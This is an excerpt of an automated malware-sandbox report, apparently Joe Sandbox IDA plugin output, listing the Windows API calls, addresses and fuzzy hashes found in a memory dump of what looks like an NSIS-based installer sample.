                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID:
                                                          • API String ID: 1356686001-0
                                                          • Opcode ID: 17483ab154d9487b715a571f948454f815bfe4516c15eb07c5d100d1d2da5f96
                                                          • Instruction ID: 1cf33929fc1c1ea186c23a4fc9732b6d29fed694b94c5232bf99ec9a4aeb90bc
                                                          • Opcode Fuzzy Hash: 17483ab154d9487b715a571f948454f815bfe4516c15eb07c5d100d1d2da5f96
                                                          • Instruction Fuzzy Hash: 941172B1E00118BFEB10EFA4DE89EAF7678FB50358F10413AF905B61D1D7B85D41A668
                                                          APIs
                                                            • Part of subcall function 0040581A: CharNextA.USER32(?,?,00421100,?,00405886,00421100,00421100,0042A400,?,77582EE0,004055D1,?,0042A400,77582EE0,00000000), ref: 00405828
                                                            • Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 0040582D
                                                            • Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 00405841
                                                          • CreateDirectoryA.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 004015DB
                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015E5
                                                          • GetFileAttributesA.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 004015F3
                                                          • SetCurrentDirectoryA.KERNEL32(00000000,00429800,00000000,00000000,?), ref: 00401622
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3751793516-0
                                                          • Opcode ID: 337c7b3c4140c84b030b3cce5cd43aa59531b2b1dc8ea7579ad4e15f4152f9ed
                                                          • Instruction ID: 1974da3e9f268a507fe0b48e67c441281edfefc09bb705423f1444e47e3c3739
                                                          • Opcode Fuzzy Hash: 337c7b3c4140c84b030b3cce5cd43aa59531b2b1dc8ea7579ad4e15f4152f9ed
                                                          • Instruction Fuzzy Hash: 4D112931908150ABDB113F755D4496F37B4EA62365728873FF891B22D1C23C4D42A62E
                                                          APIs
                                                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                          • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F09
                                                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                          • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                            • Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1404258612-0
                                                          • Opcode ID: 88a471159faddf61ff8bf6f6ba4e081a66ca77f756c37004028b55345f5afde9
                                                          • Instruction ID: daf777410944a799184fcc454f008e4928398c379a2567b3caca2a2cde185cee
                                                          • Opcode Fuzzy Hash: 88a471159faddf61ff8bf6f6ba4e081a66ca77f756c37004028b55345f5afde9
                                                          • Instruction Fuzzy Hash: 1B115EB1900208BEDB01EFA5D941DAEBBB9EF04344B20807AF505F61A1D7389E54EB28
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00404F7F
                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00404FD0
                                                            • Part of subcall function 00404038: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040404A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: cc2ac9f72c883015c9b8c7a8e8247984937158d827f98eb0f0cc4c523cd7d41f
                                                          • Instruction ID: e4ca6dfb8be9ac33f077af52de3e350fef620c5d1e65b576c63f1805fc4ef9c4
                                                          • Opcode Fuzzy Hash: cc2ac9f72c883015c9b8c7a8e8247984937158d827f98eb0f0cc4c523cd7d41f
                                                          • Instruction Fuzzy Hash: 1801D4B160420AAFDF209F50DD80A9B3B66FBC0315F144137FB00B52D1D7398C51A669
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004059C5
                                                          • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 004059DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          • Opcode ID: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
                                                          • Instruction ID: 4ed204ab2def1aeaad47fe5e86fe5e9a332b18b7b34da24a025185dbc17c0528
                                                          • Opcode Fuzzy Hash: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
                                                          • Instruction Fuzzy Hash: 60F02732308308BBEB008F16DC04B9B7B9CDF95720F00C03BF904EA281D2B0D8048B98
                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00421500,Error launching installer), ref: 004054C9
                                                          • CloseHandle.KERNEL32(?), ref: 004054D6
                                                          Strings
                                                          • Error launching installer, xrefs: 004054B7
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 034994f398fec6ba88842b1298b049e6f5c009d7984ce4a05d2457150fb2f9bc
                                                          • Instruction ID: 1668edf84edc795d90e5179e363d58f44986d7750dcb732495ea53e78f2e035e
                                                          • Opcode Fuzzy Hash: 034994f398fec6ba88842b1298b049e6f5c009d7984ce4a05d2457150fb2f9bc
                                                          • Instruction Fuzzy Hash: 8AE0E674A00209BBDB109FA4DD05A6B77BCEB14345B508561B911E2160E774D9548A79
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02ed812fe0e611b0f2998a09c2da57c3139bdc2a01b144affc629b665b317990
                                                          • Instruction ID: cc181508766c158152089796d80991778684c5c1c63ccc40f22f1fdcfebbd241
                                                          • Opcode Fuzzy Hash: 02ed812fe0e611b0f2998a09c2da57c3139bdc2a01b144affc629b665b317990
                                                          • Instruction Fuzzy Hash: C8A13371E00228CBDF28CFA8C8547ADBBB1FB44305F15816EE816BB281D7785A96DF44
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 214f48695c7995470a7a0fcbeb3eca81d4e2424ba51fdacd53dd0d027dd6a452
                                                          • Instruction ID: 3fc28d3a08aea7e3d86c5d24e10e7686d7df8f1296a80a0676572424d41607f7
                                                          • Opcode Fuzzy Hash: 214f48695c7995470a7a0fcbeb3eca81d4e2424ba51fdacd53dd0d027dd6a452
                                                          • Instruction Fuzzy Hash: FF912370E00228CBDF28CF98C8547ADBBB1FB45305F15816ED816BB291D7785A96DF44
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aafcf2097c1515207922f326c8ed1c2e4537c5f7359ba1e2f684dafb2374b94b
                                                          • Instruction ID: dd30d2edeb09ef8142f3126e4ca7f9bb6d977725bfad211a31da1ac854ab15b9
                                                          • Opcode Fuzzy Hash: aafcf2097c1515207922f326c8ed1c2e4537c5f7359ba1e2f684dafb2374b94b
                                                          • Instruction Fuzzy Hash: 29814771E00228CFDF24CFA8C8447ADBBB1FB44305F25816AD416BB281D7389A96DF05
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 439609ef046878b9c851ba854847407a98b524300d750c8d5ff49980f3ce6887
                                                          • Instruction ID: 9c7bf14ce72a16f54db54216be52a61449617ebae17e1f3f959b8044aea663dd
                                                          • Opcode Fuzzy Hash: 439609ef046878b9c851ba854847407a98b524300d750c8d5ff49980f3ce6887
                                                          • Instruction Fuzzy Hash: 42816771D00228CBDF24CFA8C8447ADBBB1FB44305F11816EE856BB281D7786A96DF45
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ca8852c6a58b64f8378a0d1c7197c8df105657e20cc6a0d4183a5da649b504f
                                                          • Instruction ID: 46e89f5986d2092b55afe70fa6685d9fa399791e8108fb818b391c00f2395523
                                                          • Opcode Fuzzy Hash: 5ca8852c6a58b64f8378a0d1c7197c8df105657e20cc6a0d4183a5da649b504f
                                                          • Instruction Fuzzy Hash: DB7134B1D00228CFDF24CFA8C9547ADBBB1FB48305F15816AE816BB281D7385A96DF45
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b7285504dc25ebea62f348072f1f3953958a79e977259425cfc79aacb6983c9
                                                          • Instruction ID: 5e67b4a66f05046138c2ae5a0676b57ce30197662a7df0c6b5261f8fe412ade3
                                                          • Opcode Fuzzy Hash: 7b7285504dc25ebea62f348072f1f3953958a79e977259425cfc79aacb6983c9
                                                          • Instruction Fuzzy Hash: 22713471E00228CBDF28CFA8C854BADBBB1FB44305F15816ED816BB291D7385A96DF45
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c3b74398c38f172e1519338bca71769cfe788df72e053bc328fcfef0089e390
                                                          • Instruction ID: 362732d661397dfbd4d13a455e5b242d3c248a06ae4e9e58d05d54b49be68c20
                                                          • Opcode Fuzzy Hash: 7c3b74398c38f172e1519338bca71769cfe788df72e053bc328fcfef0089e390
                                                          • Instruction Fuzzy Hash: E7714671E00228CBDF28CF98C854BADBBB1FB44305F15816EE816BB291D7386A56DF45
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 004058F7
                                                          • lstrcmpiA.KERNEL32(00405B16,00000000), ref: 0040590F
                                                          • CharNextA.USER32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405920
                                                          • lstrlenA.KERNEL32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405929
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                          • Instruction ID: 42f6177a7bbf9ad164fe3de6883cfd7493767cce72774148ee1a9d65a6b1b045
                                                          • Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                          • Instruction Fuzzy Hash: 87F06236604558FFC7129FA5DD4099EBBA8EF16360B2540A9E800F7260D674EE01ABA9